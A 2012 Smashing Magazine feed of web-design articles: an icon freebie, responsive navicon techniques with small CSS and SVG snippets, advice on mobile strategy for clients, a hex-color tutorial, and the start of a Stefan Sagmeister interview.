    Continue with Reusable Code for good or for awesome (slides), a talk by Jake Archibald on designing APIs. Back in 2007 Joshua Bloch gave the presentation How to Design a Good API and Why It Matters at Google Tech Talks. While his talk did not focus on JavaScript, the basic principles that he explained still apply.

    Now that you’re up to speed on designing APIs, have a look at Essential JS Design Patterns by Addy Osmani to learn more about how to structure your internal code.

    Thanks go out to @bassistance, @addyosmani and @hellokahlil for taking the time to proof this article.

    © Rodney Rehm for Smashing Magazine, 2012.

  • Freebie: Movie Icon Set (PSD Source, PNG, JPG)


    Today, we present yet another freebie — a free set of icons related to movies and television, designed by Samuray and released for Smashing Magazine and the design community. The icons are available in six different sizes as transparent PNG files, JPG files as well as Photoshop PSD source files. The icons are released under a Creative Commons Attribution license.

    Movie Icon Set

    Download The Set For Free!

    You can use this icon set freely for commercial and personal projects. Please link to this release post if you want to spread the word.


    Perhaps you’d like to showcase your interests in your portfolio, or perhaps an obscure indie filmmaker has asked you to put up a small site for their upcoming movie. Or maybe you are organizing a party and would like to invite your good ol’ friends or colleagues to a movie evening. Eventually you might end up looking for a set of original cinema or TV-related icons, and purchasing generic stock icons isn’t really an option. In these (and hopefully many other) cases, this icon set might be useful.

    This set contains 10 images related to film, movies and the movie-going experience. Each icon is available in six sizes: its original size, 256×256px, 128×128px, 64×64px, 32×32px and 16×16px. The icons included are:

    • Ticket
    • Anaglyph Glasses
    • Camera
    • Cinema Seat
    • Clapperboard
    • Soft Drink
    • Film Reel
    • Megaphone
    • Popcorn
    • TV Set

    The icons are licensed under the Creative Commons Attribution-ShareAlike 3.0 Unported license. You are free to distribute, transform, fiddle with and build them into your work, even commercially. However, please always credit the original designer of the set (in this case, Nikolay Kuchkarov).

    Free Movie Icon Set

    Behind The Design

    As always, here are some insights from the designer:

    “My inspiration was the Academic Icon Set. I saw this amazing set and decided to make my own, and today I am honored to share the results with you all. This icon set is the result of about a month of work, and I hope that you will love it!”

    — Nikolay Kuchkarov

    Also, you can watch the video of the design process for the icons below:

    Making of Clapperboard icon from Samuray on Vimeo.

    Making of Popcorn box icon from Samuray on Vimeo.

    Thanks, Nikolay! We sincerely appreciate your time and efforts!

    (jc) (vf)

    © Smashing Editorial for Smashing Magazine, 2012.

  • Design Patterns: The Semantic, Responsive Navicon


    Icons are scattered throughout our history as a species: early humans painted pictures onto stone depicting their triumphs over their hunted prey, Egyptians had an icon-based writing system in their hieroglyphics, and in the early church the symbol of a fish represented a Christian meeting place or tomb. Icons have always served a definitive purpose throughout mankind’s history on this planet: to inform and instruct.

    Icons are still prominent today in our everyday lives, as they serve the same purpose as they always have. As the craftsmen of the Web industry, we must ensure that we use correct representations of actions to inform users of their consequences.

    As the Web has evolved over the years, we have established a (fairly) standard set of icons — a trash can or a cross has come to represent deleting or removing something; an envelope has become the indicator for a message or mail. These are little visual cues to help people along their way. Some icons have established such strong associations that they can exist on their own without supporting text, meaning, they can remove language barriers to form their own universal language. We need to use the right icons to communicate the right things.

    Today’s Web is in a transitional phase, probably the most groundbreaking phase since the Web standards movement; I would go as far as suggesting that we are in the middle of the Responsive Web Design movement. As we build responsively, our websites will appear differently on different devices and often behave differently too. Navigation menus in particular can change dramatically in responsive websites. The change from a large context to a small context often requires changing the navigation pattern to something rarely seen on the Web until the arrival of responsive design. As more and more responsive websites go live, more people will encounter these newfangled navigation solutions, and they shouldn’t have to ask “What does that button do?”.

    There have been calls recently from Andy Clarke and Jeremy Keith to have a standard icon for revealing navigation in small contexts, and rightly so — this is a new technique and we need to set users’ expectations about the consequence of the reveal action.

    Three Horizontal Lines

    The majority of responsive websites that use an icon to represent a hidden menu opt for the three horizontal stripes; these include some high-profile websites like Starbucks and also popular apps like Facebook and Path. Part of its power lies in its versatility: the icon itself doesn’t clearly represent a precise object or method, which means it can be applied to a variety of navigation-based design patterns without showing a preference for a particular pattern. Its vagueness in shape doesn’t detract from its message as the icon becomes an emerging standard. Like a new term appearing in our everyday language, we know what it means. And with high-profile websites throwing their weight behind it, so will average users over time.

    Let’s take a look at some examples of the horizontal lines being used in responsive websites.

    Twitter Bootstrap
    Twitter’s Bootstrap framework shows three horizontal lines as a visual cue for a sliding menu, revealing the main menu links, which anchor to the various sections of the page.

    Webdagene
    The Webdagene conference website also uses the same pattern for a similar reveal, but unlike Twitter’s Bootstrap, the links open a new page instead of anchoring to sections: two different approaches to navigation encompassed by the same icon.

    dConstruct 2012
    dConstruct uses the three horizontal lines to represent the menu revealed in an upward sliding transition. Note that even though the revealed items here are square in shape, they still use the horizontal lines to represent the menu.

    Golden Grid System
    Joni Korpi’s Golden Grid System uses the same icon but for a different purpose — pressing the button shows the gridlines for the currently active grid.

    The three lines icon isn’t the only indicator people are using in the wild — like the alternatives, it has its drawbacks. In iOS, three horizontal lines are used to signify the ability to re-arrange full-width list items. So perhaps this part of our icon language is still finding its feet.

    Alternative Patterns

    Cognition by Happy Cog
    There are alternative patterns in the wild that aren’t as common, such as Happy Cog’s grid icon. This could perhaps indicate something similar to a speed dial or home screen, a springboard to other destinations. On the other hand, it could mislead less experienced users into thinking they are leaving the website to go somewhere else.

    Sony also deviates from the three horizontal lines icon and opts for a plus icon to show its menu. While visually pleasing, the plus symbol signifies adding something, so it might send the wrong message to users and fail to clearly articulate the resulting action.

    Nathan Sawaya
    Nathan Sawaya’s hidden menu is represented by a cog which also could cause confusion. In digital products, the cog icon has become the universal indicator for settings, options or for customization. It feels like it’s misrepresenting the action and consequence, and may only be pressed as a last resort or out of curiosity.

    MSN Olympics Coverage
    Governor Technology produced MSN’s Olympics coverage website, which boasts a series of creative pattern translations, including the main navigation, represented by a downward arrow. The downward arrow is a safe bet, specifically in slide-down menus: it hints towards the consequence in the same way a <select> menu would.

    Microsoft recently launched a new responsive home for its products, expertly designed and developed by Paravel using Microsoft’s new design language. The icon used to represent the menu in small contexts is a good example of the “table of contents” metaphor, which communicates that clicking the icon leads to an overview of the available navigation options.

    All of these examples produce the same end result: you push a button, and a menu appears. But there is a disparity in how the action is presented. If icons are a language, then we are sending mixed messages where responsive navigation is concerned. We are dealing with new patterns and new techniques, but so are the people on the other side of our products, and they are closer to our interfaces than ever before, especially on touch-based devices where nothing sits between the user and the interface. The message we deliver needs to be consistent and clear; the icon is part of this message, part of the greater language. As Andy Clarke has already said: “We need a standard show icon for Responsive Web Design”.

    “Unless our navigation is arranged in a grid (and so we should use a grid icon), I’m putting my weight behind three lines because I think it’s most recognizable as navigation to the average person.”

    — Andy Clarke, We need a standard show navigation icon for Responsive Web Design.

    I would wager that the vast majority of users faced with a hidden menu in small contexts have already used the three lines pattern to navigate rather than the alternatives. With the sheer number of users on apps like Facebook and Path, it’s safe to say that it’s an intuitive indicator. If we are to use it effectively in resolution-independent responsive designs, then it needs to be rendered in a scalable way, ensuring that it stays legible regardless of the device it is displayed on. There are a number of ways we can do this.

    Pictographic Web Fonts

    “Don’t get hung up on ‘Retina’, worry about hi-res.”

    — Adam Bradley, Responding to the New High-Resolution Web.

    With different pixel densities cropping up, resolution independence is crucial to achieving a consistent experience regardless of the user’s context. It’s impossible to design for device dimensions and specific screen properties and stay future friendly at the same time. Scalable assets are key to staying ahead of the game, and one way to create them is to use pictographic Web fonts.

    In theory, you could create a font containing only one glyph to represent the menu indicator. It would be a light resource to load, but you would still be imposing an additional HTTP request on the user, which isn’t ideal (it would essentially be a hack). Additionally, if the user is on a very slow connection, then the icon may take time to load. During that time they may miss the menu option — we are talking about mere seconds and potentially fractions of seconds here — but this level of care and attention to detail is what defines you as a craftsman of the Web. After all, each decision you make directly affects the user on the other side of the screen.

    You could get around this by embedding the Web font as a data URI, which would save the additional HTTP request. This is fine in isolation, but if you are loading multiple data URIs in different places, you run into maintainability issues. Multiple font variations can also produce a page-weight overhead that would render this approach pointless. So it all depends on your individual use case.
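    Embedding the font as a data URI might look something like the sketch below. The font name is made up and the base64 payload is elided; this is only to illustrate the shape of the technique, not production code.

```css
/* Hypothetical example: a single-glyph icon font embedded directly
   in the stylesheet, avoiding a separate font request. */
@font-face {
  font-family: "NaviconGlyph"; /* made-up name */
  src: url("data:application/font-woff;base64,…") format("woff");
}

.menu-toggle {
  font-family: "NaviconGlyph", sans-serif;
}
```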

    In general, we should avoid loading a Web font solely for one glyph for use in displaying our responsive navigation icon. The page weight today is as important as it was when we were designing and building for dial-up connections, and latency is the new Web performance bottleneck, so keeping the webpage size small is still very important. The contrast in connection capabilities is larger than it has ever been and any unnecessary burdens on the user’s connection can have a negative impact on the user’s experience.

    However, it’s likely that you may be loading pictographic icons for other purposes in your project. If that is the case, then I see no harm in loading the set containing the three horizontal lines icon and making use of the range of glyphs at your disposal. Josh Emerson takes this a step further and has produced a fantastic walkthrough showing you how to create a font fit for purpose, containing only the glyphs that you need for your project (which consequently keeps resources light and page weight down). IcoMoon is a browser-based app that lets you do something similar by offering a library of pre-selected icons and the option to import SVGs to build your own font.

    Unicode Characters

    Standard system fonts provided us with a false glimmer of hope. The character “Trigram for Heaven” (☰, U+2630) is exactly what we are looking for, only it doesn’t render correctly on Android devices. Jeremy Keith has done some research into platform and browser compatibility in his Navicon article, which concludes that the downward arrow character has better cross-platform and cross-browser compatibility for indicating a reveal menu. There are similarly suitable Unicode characters, like “Identical To” (≡, U+2261). This has much better support than the Trigram for Heaven (although the geometric shapes aren’t quite in proportion with the icon we have become familiar with).
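    Dropping the character into markup is straightforward; a minimal sketch (the class name and markup are illustrative, not from any of the websites mentioned):

```html
<!-- The trigram character used as a menu toggle via its HTML entity. -->
<a href="#nav" class="menu-toggle" title="Menu">&#x2630;</a>
```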

    Live demo

    You can see that the icon retains its sharpness when the user’s browser is zoomed, as a pictographic Web font would. Proportionally it isn’t ideal, although it may provide a good fallback to a more suitable technique.


    The CSS Approach

    Tim Kadlec and Stu Robson have produced the navicon in CSS by cleverly mixing border styles on the :before pseudo-element, an approach that works in all major device browsers. While this seems ideal, it isn’t exactly best practice: we are using CSS to draw a graphic, and CSS-generated “graphics” sit in the blurred area between presentation and content.

    Live demo

    When the browser zoom level is set to something other than a multiple of 100%, the proportions between the generated lines become uneven, which wouldn’t happen with the other solutions presented here. I wouldn’t rule this approach out completely, however, as it serves as a solid workaround when the following approach fails.
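    The border trick can be sketched roughly as follows. The selector and sizes here are illustrative only, not Kadlec’s or Robson’s actual code: a `double` top border paints two lines, and a solid bottom border supplies the third.

```css
/* Hypothetical navicon drawn purely with borders. */
.navicon:before {
  content: "";
  display: inline-block;
  width: 1.25em;
  height: 0.25em;                  /* gap between middle and bottom line */
  border-top: 0.375em double #333; /* two lines with a built-in gap */
  border-bottom: 0.125em solid #333;
}
```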

    The SVG Approach

    Without doubt, SVG is a good fit for crafting the icon. An icon is, by definition, a picture or symbol that represents an action, so a scalable vector graphic is the right tool for the job. The browser draws the SVG from mathematical parameters, meaning that it is resolution independent: it will look crisp at whatever pixel resolution or density it is presented, making it a future-friendly solution. Support for SVG is pretty good across the contexts we need it for (mainly mobile devices, although some versions of Android don’t support it).

    We can cater to browsers that don’t support SVG by using feature detection. A custom build of Modernizr that only checks for SVG provides a lightweight way of testing support: if the browser can render SVG, the user is shown the SVG image; if it can’t, we revert to a bitmap image. After loading Modernizr, checking for SVG support is simple:

    if (!Modernizr.svg) {
        // No SVG support: swap in the bitmap fallback
        // (the .css() call here relies on jQuery)
        $("#svg-icon").css("background-image", "url(fallback.png)");
    }

    SVG isn’t as widely utilized yet as it should be. Perhaps this is due to the lack of mainstream tools for creating them. The tools do exist, though; we just need to look a bit harder to find them and grow accustomed to them. Crafting SVGs should become second nature to us as we enter a new high-definition Web.

    Live demo

    The SVG icon stays sharp when loaded at any resolution; however, when the page is zoomed after the initial load, the graphic can begin to blur in certain browsers at irregular zoom levels. The main drawback of using SVG for retina graphics is its limited customizability in the browser, for example, changing the color of the icon. What seems like a straightforward property change cannot be achieved without JavaScript intervention (or without loading an additional image), which means triggering another HTTP request. Furthermore, if HTTP requests are a concern and you want to load the SVG inline, you will have limited browser support; just be sure to use feature detection to cover all eventualities so that the user’s experience isn’t affected. You can download the SVG icon and the PNG fallback.
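    For illustration, an inline SVG navicon might look something like this sketch; the dimensions and fill are arbitrary, and, as noted above, inline SVG itself has limited browser support:

```xml
<!-- Three rectangles form the three-line icon; the viewBox keeps it
     scalable to any rendered size. -->
<svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 32 32">
  <rect y="4"  width="32" height="6" fill="#333"/>
  <rect y="13" width="32" height="6" fill="#333"/>
  <rect y="22" width="32" height="6" fill="#333"/>
</svg>
```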

    To Conclude

    After reading this, you may feel that I’m over-analyzing something small, and on the surface it may look insignificant, when in fact it’s quite the opposite. Building responsively requires more care and attention than we have ever given to our craft. A mobile-first approach invites opportunities for the butterfly effect in our work, in which a bad decision that increases page weight (or loads redundant resources) for small contexts could be detrimental to the user experience there and beyond. We, as craftsmen of the Web, have a duty to inform and instruct sensibly and to exercise responsible Web design.

    Further Resources

    (jvb) (vf)

    © Jordan Moore for Smashing Magazine, 2012.

  • Business Strategy: Giving Our Clients The Best Deal In Mobile


    Are we cheating our clients when it comes to mobile? More precisely, are we allowing our desire for mobile work to get in the way of providing our clients with the best solution for their business needs? This is the uncomfortable question we asked ourselves recently when redesigning our agency’s website, and we want to discuss it with the broader Web community: You, dear reader.

    The recently relaunched Headscape website
    When redesigning our own website, we were forced to challenge our reasons for putting so much emphasis on mobile development.

    We are not for a minute suggesting that either we or anyone else is intentionally taking advantage of the current excitement about mobile to “con” our clients. However, we do wonder whether our clients’ excitement and our own desires are hindering our ability to make rational business decisions — decisions that would lead to the best solution for our clients.

    Jumping On The Band Wagon

    By now, we all know that mobile is the next big thing. Not only do we realize it, but our clients know it, too. The growth in smartphone usage and the availability of fast mobile Internet connections are driving an explosion in mobile Web access. Organizations of all shapes and sizes need to start taking mobile seriously or else suffer in the near future.

    Mobile growth infographic
    There can be little doubt that mobile is becoming a major way to access the Web.

    For us, mobile is new and exciting and spells the future for our industry and careers. Unsurprisingly, we want to be a part of that. This scenario is not dissimilar to the one that many print designers found themselves in, all those years ago. When the Internet arrived and everybody was desperate to get their first website, the print design world skilled up and got building. Many websites were built in those early days that were never visited by an actual user. For many, the excitement got ahead of the demand.

    Nothing is wrong with us as a community wanting to move into new areas. Nevertheless, we need to ensure that we do not push solutions onto our clients that they do not yet need, simply to boost our portfolio.

    Do Our Clients Need To Think Mobile Yet?

    Timing is everything. For businesses that are trying to turn a profit, their return on investment (ROI) matters.

    Although mobile is important, it still amounts to a very small percentage of the overall traffic for many organizations. So, quite often, optimization for mobile lands at the bottom of the design debt list — the list of issues that have to be addressed by the design team. Business considerations, particular features and technical issues in the shop often have a higher priority, especially if the client’s company is relatively small.

    While investing in the future is, of course, important to the client, if they do so too early, they run the risk of putting money into areas that don’t have an immediate return and that might be out of date by the time they become relevant. Helping clients work through this timing issue is important for us as service providers.

    Wait a second! If we build our websites mobile-first, surely they won’t go out of date, right? I am not so convinced. Certainly, best practices in responsive design are not the same as they were a year ago. We are learning more all of the time, and best practices continue to evolve. Can you honestly claim that the code and design solutions you came up with a year ago are as good as the code you are writing today? Responsive design patterns emerge and change, CSS and JavaScript techniques evolve, and some solutions don’t stick around for long.

    Percentage of mobile traffic on one example site
    For many websites, the percentage of mobile traffic is still relatively low.

    It’s difficult because many clients are just as excited as us about mobile. They want to build a mobile app or website because they love playing with their shiny new device. They know that mobile is the future and, so, convince themselves that now is the right time to invest. But it might not be right for their circumstances. Mobile might not yet be worth spending their budget on. Timing is everything when considering ROI.

    The Cost Of Native

    Among shiny things, native apps are the shiniest of all. Whatever arguments you may have against building native apps, if you put your bias aside (we all have bias), it is difficult to argue — at least to our clients — that native is not cool, slick and shiny.

    In my experience, when most clients think mobile, they think apps. You don’t see TV advertisements promoting mobile websites, but a lot of ads promote app stores and native applications. Clients might not know the difference between native and hybrid — and our responsibility is to explain the difference to them — but when they think “apps,” they want “cool, shiny and in the app store.” They want a native app.

    However, such apps are expensive. You need developers with a specialized skill set. It might sound obvious, but building apps is very different from building websites. Apps are software. Software projects need more rigorous planning and longer testing cycles, and so they take longer to complete.

    And then you have to consider multiple platforms. If you go the native app route, then each time you roll out an app to a new platform (Windows, iOS, Android, BlackBerry), you have to do a lot of the work again. Usually little can be reused. Also, operating systems are updated a couple of times a year, and there will be at least one new device each year, too. These changes usually require apps to be updated as well. Of course, when dealing with Apple at least, there is no guarantee that your app will be approved and added to the store for customers to download.

    You can reduce the costs involved by using hybrid app solutions and HTML5. The hybrid and native approaches each have their pros and cons and their own place, but the bottom line is that app development is an expensive business.

    The Hidden Costs Of Responsive Design

    There may well come a time when we need to build bespoke versions of websites for mobile devices. As users replace laptops with tablets and many others access the Web only on their phones, such a move would be a worthwhile investment for some organizations. In the meantime, for everyone else, responsive design is a good solution. Because it applies a new style sheet to the client’s existing HTML implementation, it need not be costly to implement.

    At least that is the theory. In reality, things are more complicated. We all claim that responsive design is a cheap solution, but that depends on how far we take it. At the most basic level, responsive design just requires some changes to the CSS. However, we all know in practice that that is not always the case. Making an existing website responsive can be incredibly time-consuming, especially if you have to deal with legacy HTML code that can’t be easily changed.

    The Special Cases

    Responsive design is not as simple as linearizing the content. Many elements need special attention. The most obvious is navigation, which often scales poorly across devices. However, it is not the only element. Maps, video, slideshows, graphics and tables all need special attention. Also, third-party “widgets” that embed content on a website aren’t always configured to be responsive.

    Example of desktop navigation
    Navigation does not always translate easily to mobile devices.

    The Cost of Imagery

    Then there is the biggest challenge of all: images. Many Web designers are rightly suggesting that delivering desktop-sized images to mobile devices is unadvisable due to bandwidth limitations. We also now need to consider devices with high-pixel-density displays, which require even larger images. However, optimizing images for different platforms and creating a mechanism to deliver these further increases the cost of responsive design. At some point, you have to consider client-side and/or server-side optimizations to address this and other issues, such as reducing the load of elements that won’t be displayed on mobile devices.

    There is even talk now of the need to optimize typography so that it scales for different devices. Again, the idea has a lot of merit, but a price tag comes with it. The problem is that we as Web designers want to be seen by our peers as producing websites that use the absolute latest best practices. God forbid that we are seen coding with last year’s techniques!

    Giving Our Clients The Best Deal In Mobile
    Now, screens are changing not just in size, but also in pixel density. Oliver Reichenstein suggests that we do not just need responsive layouts, we also need responsive typefaces. He has launched iA’s new website with responsive typography with a custom-built responsive typeface.

    Of course, our desires are not what matters. What matters is that we provide our clients with solutions that make sense for them. This often entails providing a solution that we consider to be inferior. Not every client needs a Rolls-Royce — some will be happy with a Skoda.

    The question is: how do you know which solution best fits a client?

    Picking The Right Solution

    As I have already suggested, ROI should be the primary criterion in determining the right approach. If a client has a large audience that is willing to pay good money for an app, then you can go to town and build a Rolls-Royce. But if the project is more speculative, then starting simple would be best.

    But money should not be the only deciding factor. The choice between a native app and a responsive website, for example, is not really a budgetary one. After all, a responsive website could cost more than some native apps.

    In some cases, the decision will come down to what the app will do. If the client’s primary requirement is to deliver content to the user, then a responsive website is probably more appropriate. In my experience, the kinds of native apps that users download and continue to use are task-oriented. If your client wants to enable users to complete certain tasks quickly, then a native app might be the answer. Otherwise, use the Web.

    The only exception is when the client needs to access features on mobile devices that are inaccessible to the browser. Typical examples are things such as the camera and the accelerometer.

    If you conclude that a Web-based solution is the right approach, then it becomes an issue of budget and timing. If the client is happy with their existing website and doesn’t wish to change it, then you could consider building a mobile website that targets particular devices. This might not be your preferred approach, but it could be the most cost-effective until the client undertakes a redesign.

    If the client’s budget is tight, then you might choose to use media queries to target certain ranges of screen resolutions, rather than going fully responsive. This will make development slightly easier, thus keeping costs down. Similarly, you would have to leave image optimization to the carrier, rather than optimize images on the server.

    The message here is simple. Whether talking about native apps, responsive websites or anything in between, we need to put aside our personal desires and even the desires of the client, focusing instead on what the client really needs: a mobile solution that generates the best return for their business.

    (Image credits on the front page go to Information Architects.)

    (jc) (al) (il)

    © Paul Boag for Smashing Magazine, 2012.

  • Hex Colors: The Code Side Of Color


    The trouble with a color’s name is that it never really is perceived as the exact same color to two different individuals — especially if they have a stake in a website’s emotional impact. Name a color, and you’re most likely to give a misleading impression. Even something like “blue” is uncertain. To be more precise, it could be “sky blue”, “ocean blue”, “jeans blue” or even “arc welder blue”.

    Descriptions vary with personal taste and in context with other colors. We label them “indigo”, “jade”, “olive”, “tangerine”, “scarlet” or “cabaret”. What exactly is “electric lime”? Names and precise shades vary — unless you’re a computer.

    Code Demands Precision

    When computers name a color, they use a so-called hexadecimal code that most humans gloss over: 24-bit colors. That is, 16,777,216 unique combinations of exactly six characters made from ten numerals and six letters — preceded by a hash mark. Like any computer language, there’s a logical system at play. Designers who understand how hex colors work can treat them as tools rather than mysteries.

    Breaking Hexadecimals Into Manageable Bytes

    Pixels on back-lit screens are dark until lit by combinations of red, green, and blue. Hex numbers represent these combinations with a concise code. That code is easily broken. To make sense of #970515, we need to look at its structure:

    The first character, #, declares that this “is a hex number.” The other six are really three pairs of characters, each drawn from 0–9 and a–f. Each pair controls one primary additive color.

    Hex Reading
    The higher the numbers are, the brighter each primary color is. In the example above, 97 controls the red, 05 the green and 15 the blue, so red dominates.

    Each pair can hold only two characters, but #999999 is only medium gray. To reach colors brighter than 99 with only two characters, hex numbers use letters to represent the values 10 through 15. A, B, C, D, E and F after 0–9 make an even 16 characters, not unlike jacks, queens, kings and aces in cards.

    Diagram showing how hex colors pass above 0-9
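    The letter digits aren’t special; each pair is just a two-digit base-16 number. A quick console sketch (not from the article) shows how they decode:

```javascript
// Each hex pair is a base-16 number, which parseInt can decode
// into its 0-255 channel value.
var gray = parseInt("99", 16); // 153, i.e. only medium gray per channel
var full = parseInt("ff", 16); // 255, a channel at full strength
```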

    Being mathematical, computer-friendly codes, hex numbers are strings full of patterns. For example, because 00 is a lack of primary and ff is the primary at full strength, #000000 is black (no primaries) and #ffffff is white (all primaries). We can build on these to find the additive and subtractive colors. Starting with black, change each pair to ff in turn:

    • #000000 is black, the starting point.
    • #ff0000 stands for the brightest red.
    • #00ff00 stands for the brightest green.
    • #0000ff stands for the brightest blue.

    Subtractive colors start with white, i.e. #ffffff. To find the subtractive primaries, change each pair to 00 in turn:

    • #ffffff is white, the starting point.
    • #00ffff stands for the brightest cyan.
    • #ff00ff stands for the brightest magenta.
    • #ffff00 stands for the brightest yellow.

    Mixing additive colors to make subtractives

    Shortcuts In Hex

    Hex numbers that use only three characters, such as #fae, imply that each ones place should match the sixteens place. Thus, #fae expands to #ffaaee, and #09b really means #0099bb. These shorthand codes provide brevity in code.
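    The expansion rule is simple enough to express as a tiny function; this is a sketch of my own (the function name is made up), doubling each character of the shorthand:

```javascript
// Expand three-character hex shorthand by doubling each character,
// e.g. "#fae" becomes "#ffaaee".
function expandHex(shorthand) {
  return "#" + shorthand
    .replace("#", "")
    .split("")
    .map(function (c) { return c + c; })
    .join("");
}
```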

    In most cases, one can read a hex number by ignoring every other character, because the sixteens places tell us more than the ones places. That is, it’s hard to see the difference between 41 and 42; easier to gauge is the difference between 41 and 51.

    Diagram emphasizing the first character in each pair of characters

    The example above has enough difference among its sixteens places to make the color easy to guess: lots of red, some blue, no green. This would give us a warm violet. The sixteens places in the second example (9, 9 and 8) are very similar, so to judge this color, we need to examine the ones places (7, 0 and 5). The closer a hex color’s sixteens places are to each other, the more neutral (i.e. less saturated) the color will be.

    Make Hexadecimals Work For You

    Understanding hex colors lets designers do more than impress co-workers and clients by saying, “Ah, good shade of burgundy there.” Hex colors let designers tweak colors on the fly to improve legibility, identify elements by color in stylesheets, and develop color schemes in ways most image editors can’t.

    Keep Shades In Character

    To brighten or darken a color, one’s inclination is often to adjust its brightness. This makes a color run the gamut from murky to brilliant, but loses its character on either end of the scale. For example, below a middle green becomes decidedly black when reduced to 20% brightness. Raised to 100%, the once-neutral green gains vibrancy.

    A funny thing happens when we treat hex colors as if they were increments of ten. By adding one to the left-hand character of each pair, we raise a color’s brightness while lowering its saturation. This prevents shades of a given color from wandering too close to pitch black or brilliant neon. Altering hex pairs this way retains the essence of a color.

    Diagram showing how hex affects brightness and saturation

    In the example above, the top set of shades appears to gain yellow or fall to black, even though it’s technically the same green hue. By changing its hex pairs, the second set appears to keep more natural shades.
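    The pair-wise adjustment above can be sketched as a small function. This is a hypothetical helper of my own, not from the article:

```javascript
// Add one to the sixteens place of each pair: brightness rises a step
// while the color keeps its character, e.g. "#999999" -> "#a9a9a9".
function lightenStep(hex) {
  var pairs = hex.replace("#", "").match(/../g); // ["rr", "gg", "bb"]
  return "#" + pairs.map(function (pair) {
    var sixteens = parseInt(pair.charAt(0), 16);
    // Raise the sixteens place by one, capping at f.
    return Math.min(sixteens + 1, 15).toString(16) + pair.charAt(1);
  }).join("");
}
```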

    Faded Underlines

    By default, browsers underline text to denote links, but thick underlines interfere with letters’ descenders. Designers can make underlines less obtrusive by scaling back their hex colors. The idea is to move the underline’s color closer to the background color, while the link text itself keeps its contrast against the background.

    • For dark text on a bright background, we make the links brighter.
    • For bright text on a dark background, we make the links darker.

    To make this work, every embedded link needs a <span> inside of every <a>:

    a { text-decoration: underline; color: #aaaaff; }

    a span { text-decoration: none; color: #0000ff; }

    Example of underlines that pale compared to the clickable text

    As you can see here, underlines in the same color as the text can interfere with parts of type that drop below the baseline. Changing the underline to resemble the background more closely makes descenders easier to read, even though most browsers place underlines above the letterforms.

    Adding spans to every anchor tag can be problematic. A popular alternative is to remove underlines and add border-bottom:

    a { text-decoration: none; border-bottom: 1px solid #aaaaff; }

    Better Body Copy

    A recurring design problem is that a color may be technically correct yet have an unintended effect. For example, some designs call for headings and body copy in the same color. Keep in mind that the thicker a letterform’s strokes, the darker the text appears: small, thin body copy looks lighter than a heavy heading set in the same color.

    Example of text that, while technically correct, appears too bright

    h1, p { color: #797979; }

    Example of text technically darker but visually the same

    h1 { color: #797979; }

    p { color: #393939; }

    While the two colors in the first example are technically identical, the body copy’s narrower, more delicate letterforms make it appear brighter than the heading. Lowering the sixteens place of each pair (here, from 7 to 3) makes the body text easier to read.

    How To Warm Up Or Cool Down A Background

    Neutral backgrounds may be easy to read against, but “neutral” doesn’t have to mean “bland”. Adjusting the red and blue pairs (the first and last byte) can make a background subtly warmer or cooler.

    Examples with slight background color variations

    • #404040 — neutral
    • #504030 — warmer
    • #304050 — cooler

    Is that too much? For a more subtle shift, use the ones places instead:

    Examples of very slight variations in background color

    • #404040 — neutral
    • #594039 — warmer
    • #394059 — cooler
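    The warm/cool adjustment amounts to raising one end of the hex triplet while lowering the other. A minimal sketch, with `shift_temperature` as a hypothetical helper name (not from the original article):

```python
def shift_temperature(hex_color, amount=16):
    """Warm a color by raising the red channel and lowering the blue
    channel by the same amount; a negative amount cools it instead."""
    h = hex_color.lstrip('#')
    # Split into red, green and blue channel values.
    r, g, b = (int(h[i:i + 2], 16) for i in (0, 2, 4))
    # Green stays put; only the ends of the triplet move, clamped to 00-ff.
    r = max(0, min(255, r + amount))
    b = max(0, min(255, b - amount))
    return f'#{r:02x}{g:02x}{b:02x}'
```

    With the default amount of 16 (one sixteens place), `shift_temperature('#404040')` produces the warmer `#504030` from the list above, and `-16` produces the cooler `#304050`. Smaller amounts give the subtler shifts.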

    Coordinate Colors With Copy-Paste

    Recognizing the structure of a hex number’s number/letter pairs gives designers a unique tool for exploring color combinations. Unlike color wheels and charts, rearranging the pairs in a hex number is a simple way to change hues while keeping values similar. As a bonus, the results can be unpredictable. The simplest technique is to move one pair of characters to a different spot, which trades the color’s primary components.

    A common design technique to make text or other visual elements coordinate with a photo is to use colors from within that photo. Understanding hex colors can take that a step further, by deriving new colors that coordinate with the photo without taking directly from the photo.
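    Enumerating the swaps is straightforward. This is an illustrative sketch, not code from the article; `pair_swaps` is a hypothetical helper name:

```python
from itertools import permutations

def pair_swaps(hex_color):
    """List every rearrangement of a color's three hex pairs. Each
    ordering trades primary components while keeping value similar."""
    h = hex_color.lstrip('#')
    # Break the color into its three two-character pairs.
    pairs = [h[i:i + 2] for i in (0, 2, 4)]
    # set() collapses duplicates when two channels share the same pair.
    return sorted('#' + ''.join(p) for p in set(permutations(pairs)))
```

    For a color with three distinct pairs, such as `#aa4020`, this yields six coordinated variants (e.g. `#20aa40`, `#4020aa`) that share the original’s overall value.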

    Examples of how swapping primary colors can yield coordinated but interesting results

    Going Forward

    Don’t let the code intimidate you. With a little creativity, hex colors are a tool at your disposal. If nothing else, next time someone asks if you can solve a problem with code in any language, you can simply say:

    “Shouldn’t be harder than parsing hexadecimal triplets in my head.”

    © Ben Gremillion for Smashing Magazine, 2012.

  • Interview: Stefan Sagmeister: “Trying To Look Good Limits My Life”


    Stefan Sagmeister is a designer who has followed his instinct and intuition to the fullest, gaining recognition for his unique, often provocative visual explorations. It is possibly his very personal, almost self-centric approach to design that makes his work so original. On May 31, 19 years after starting his NYC studio, he once again surprised the crowds by renaming it Sagmeister & Walsh, announced in trademark Sagmeister fashion: naked in the studio.

    A bit of history: when the Austrian-born Sagmeister moved to New York, he made it his mission to work for the legendary designer Tibor Kalman (1949-1999) at M&Co, before starting his own studio, Sagmeister Inc., in 1994. Kalman, one of the two names that changed graphic design in the ’80s, as AIGA proclaims, was well respected for his social-responsibility polemic and later as the editor-in-chief of Colors magazine.

    Sagmeister earned Grammys for his iconic music packaging art (see his David Byrne CD covers). With his poster designs for AIGA, as well as a slew of heralded personal projects, it’s safe to say that his status as a design superstar has been cemented. He also received a Lucky Strike Designer Award in 2009. There are two published monographs on his work, “Things i have learned in my life so far” (2008) and “Sagmeister: Made You Look” (2001), both often found on designers’ bookshelves.

    He’s also known for taking yearlong sabbaticals away from the studio every seven years, which is obviously good for creativity and well-being (if one can afford it).

    Sagmeister's notorious AIGA poster in which the message was cut into his skin.
    For the 1999 poster for his AIGA Detroit lecture, Stefan asked his intern Martin to cut the lettering into his skin. If you want to be original, you must be able to take the pain. Photography: Tom Schierlitz

    Grammy-winning design for David Byrne
